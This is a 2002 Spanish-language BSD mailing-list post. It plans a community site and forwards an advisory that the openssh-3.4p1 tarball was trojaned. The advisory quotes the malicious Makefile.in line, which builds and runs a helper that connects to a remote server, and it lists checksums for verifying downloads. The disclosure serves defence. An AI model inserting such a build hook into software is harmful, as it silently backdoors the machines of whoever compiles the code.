Punto importante....

Freddy Ocaranza P. freddyo en colegiosanlorenzo.cl
Vie Ago 2 10:05:44 CLT 2002 

El vie, 02-08-2002 a las 09:54, Ricardo Albarracin B. escribió:
> On Fri, 2 Aug 2002 09:35:00 -0700 (PDT)
> Jorge Severino <jorge en opentrade.cl> wrote:
> 
> > Si desean cooperar no hay problema, el que quiera le doy mi cuenta...pero
> > en todo caso ya esta cancelado y fue como un regalo a la lista.
> > 
> > Jorge
> No me cabe la menor duda de tus intensiones Jorge, pero insisto lo justo es justo, esperomos hasta el Lunes para proceder y repartir gastos..
> 
> Ha y a propósito del dominio "www.todosbsd.cl", propongo lo siguiente a debate:
> 
> 1.- 	Que el Owner del sitio sea evidentemente Jorge Severino, por iniciativa, inscripción y por enlace.
Absolutamente de acuerdo...
> 2.-	Disponer de una lista de participantes y colavoradores inscritos.
Sip...yo me anoto
> 3.-	Generar grupos pequeños de trabajo, para poner o publicar
diferentes paper de configuraciones de las cosas más
> 	tipicas, tal como Servidores SAMBA, de Mail (Qmail, Sendmail, y otros), Cortafuegos con PacketFilter, Servi-
> 	dores DNS, Servidores de Fax, etc, para lo cual debemos inscribirnos por ejemplo en que area nos interesaría,
> 	participar, y el Owner arma los grupos (previas consultas por supuesto).
Ya tengo unos papers listitos y preparando otros...tunning por
ejemplo....
> 
> Eso por el momento, tengo algunas otras cosas en emnte pero de a poco para que no se asusten...
> 
> 

Excelente Ricardo...ya esperamos tus otras cosas....aprovecho la
oportunidad para saludar a todos los integrantes de la lista y expresar
mi "asombro" por las ganas y la cantidad de usuarios *BSD..pense que
eramos pocos....pero bueno chicos a aportar y crecer....ahora va el
mensaje de OpenSSh trojanizado.........
> Salu2

Salu2 a todos

Freddy

---------
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security




Date:      Thu, 1 Aug 2002 17:35:12 +1000
From:      Edwin Groothuis <edwin en mavetju.org>
To:        freebsd-security en freebsd.org
Subject:   openssh-3.4p1.tar.gz trojaned
Message-ID:  <20020801073512.GB78390 en k7.mavetju>


--------------------------------------------------------------------------------
Next in thread | Raw E-Mail | Index | Archive | Help
--------------------------------------------------------------------------------


FYI (I'm not on -security)

----- Forwarded message from Edwin Groothuis <edwin en mavetju.org> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin en mavetju.org>
To: incidents en securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:

  
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt en openbsd.org and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
   MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
   MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57